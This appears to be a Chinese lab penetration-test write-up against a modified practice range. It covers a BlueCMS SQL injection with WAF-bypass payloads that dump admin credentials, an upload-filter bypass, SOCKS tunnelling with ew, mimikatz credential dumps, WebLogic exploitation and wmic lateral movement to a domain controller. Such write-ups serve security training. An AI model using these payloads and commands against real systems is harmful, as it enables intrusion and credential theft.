实战|记一次内网靶机渗透测试
VSole2021-07-29 12:26:03
靶机环境-魔改的红日6,修改了bluecms源码;
外网Web:192.168.140.131/192.168.111.128
内网Web:192.168.111.80/10.10.10.80
DC:10.10.10.10
0x01 外网web
首先来到外网web:
可以看到开放了80访问看看
可以看到是bluecms 1.6。这个cms很多漏洞,网上下载一套看看。
1.1 代码审计
全文搜索下$_GET
来到ad_js.php
$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
echo 'Error!';
exit();
}
$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
if($ad['time_set'] == 0)
{
$ad_content = $ad['content'];
}
else
{
if($ad['end_time'] < time())
{
$ad_content = $ad['exp_content'];
}
else
{
$ad_content = $ad['content'];
}
}
可以看到如果ad_id不为空就删除两边的空白符号,否则输出Error,然后就会执行getone方法,跟踪下getone。
function getone($sql, $type=MYSQL_ASSOC){
$query = $this->query($sql,$this->linkid);
$row = mysql_fetch_array($query, $type);
return $row;
}
可以看到没有做任何过滤,直接带入了执行了sql语句。
http://192.168.140.131/ad_js.php?ad_id=1 and 1=1
可以看到存在waf。
1.2 waf绕过
fuzz下加上/"%!* 来干扰。 绕过order by
ad_js.php?ad_id=1/%//order////by////8
http://192.168.140.131/ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/8
ad_js.php?ad_id=1/%//order////by////7
绕过union select
ad_js.php?ad_id=-1/*%/*/union/*//*/select/*//*/1,2,3,4,5,6,7
全部被拦截,加上/!50001/再来跑
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,7
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 10:29:14 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 33 Connection: close Content-Type: text/html;charset=gb2312
获取当前表:正常语句:
union select 1,2,3,4,5,6,group_concat(table_name), from information_schema.tables where table_schema=database()
套用上面的被拦截,逐条测试哪里被拦截了
发现只要不存在database()就不会被拦截
同理fuzz括号里面就行 bypass payload:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database(/*%!"/*/
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 10:37:08 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 401 Connection: close Content-Type: text/html;charset=gb2312
可以看到存在blue_admin表,查看该表存在的字段
正常语句:
union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_name='blue_admin'
单引号过滤hex编码下
bypass payload:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626C75655F61646D696E
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 11:03:52 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 108 Connection: close Content-Type: text/html;charset=gb2312
存在admin_name,pwd
获取账密正常语句套同样的过滤语句:blue_admin:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 11:08:14 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 37 Connection: close Content-Type: text/html;charset=gb2312
pwd:
/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(pwd)%20from%20blue_admin
返回包:
HTTP/1.1 200 OK Date: Sun, 25 Jul 2021 11:09:17 GMT Server: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29 Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Set-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnly Content-Length: 64 Connection: close Content-Type: text/html;charset=gb2312
获得账密:admin/test123
1.3 后台getshell
这里尝试了文件包含发现不行,发现robots.txt下存在test目录的upload.html文件
直接被拦截了
这里我们可以修改
Content-Disposition: form-data; name="file"; filename="t.php"
为
Content-Disposition: form-data; name="file"; filename=; filename="t.php"
来绕过
0x02 内网渗透
可以看到权限还是挺高的。存在111段
上传ew到web靶机
执行
ew.exe -s ssocksd -l 1266
添加用户上去,mimikatz抓密码
aspnet 161cff084477fe596a5db81874498a24(1qaz@WSX) itsec 852a844adfce18f66009b4f14e0a98de(test123..) Administrator 852a844adfce18f66009b4f14e0a98de(test123..)
c段发现存在80
存在administrator用户明文看看能不能直接ipc
密码不对。开放了80和7001
80没啥东西7001为weblogic
存在CVE-2019-2725
拿下内网weblogic
可以看到存在域de1ay.com,拿到了本地管理员权限。
存在10.10.10段
抓下密码:
* Username : de1ay * Domain : WEB * NTLM : cb5141dcdaa451b0972f3144fda5b3cd * SHA1 : c25aadf268b15742f54e1ca78d54b1da417d5f8d * Password : 1qaz@WSX1qaz@WSX User : Administrator Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0(可能没启用)
设置多层代理 attack ip:192.168.140.1 web:192.168.140.131/192.168.111.128 weblogic:192.168.111.80/10.10.10.80
上传ew到weblogic机器上执行监听本地8888端口:
ew.exe -s ssocksd -l 8888
在攻击机器上执行,把本地端口1080跟web的9999端口绑定:
ew.exe -s lcx_tran -l 1080 -f 192.168.140.131 -g 9999
在web机器上将本地的9999跟weblogic的8888绑定:
ew.exe -s lcx_tran -l 9999 -f 192.168.111.80 -g 8888
发现存在10机器。
用现有的密码加上域用户尝试爆破
user:
de1ay\administrator de1ay\de1ay
pass:
1qaz@WSX test123.. 1qaz@WSX1qaz@WSX
1.runas获取域用户cmd:
runas /user:de1ay\administrator cmd
wmi横向移动:
wmic /node:10.10.10.10 /user:de1ay\administrator /password:1qaz@WSX1qaz@WSX process call create "cmd /c ipconfig > c:\1.txt"
VSole
网络安全专家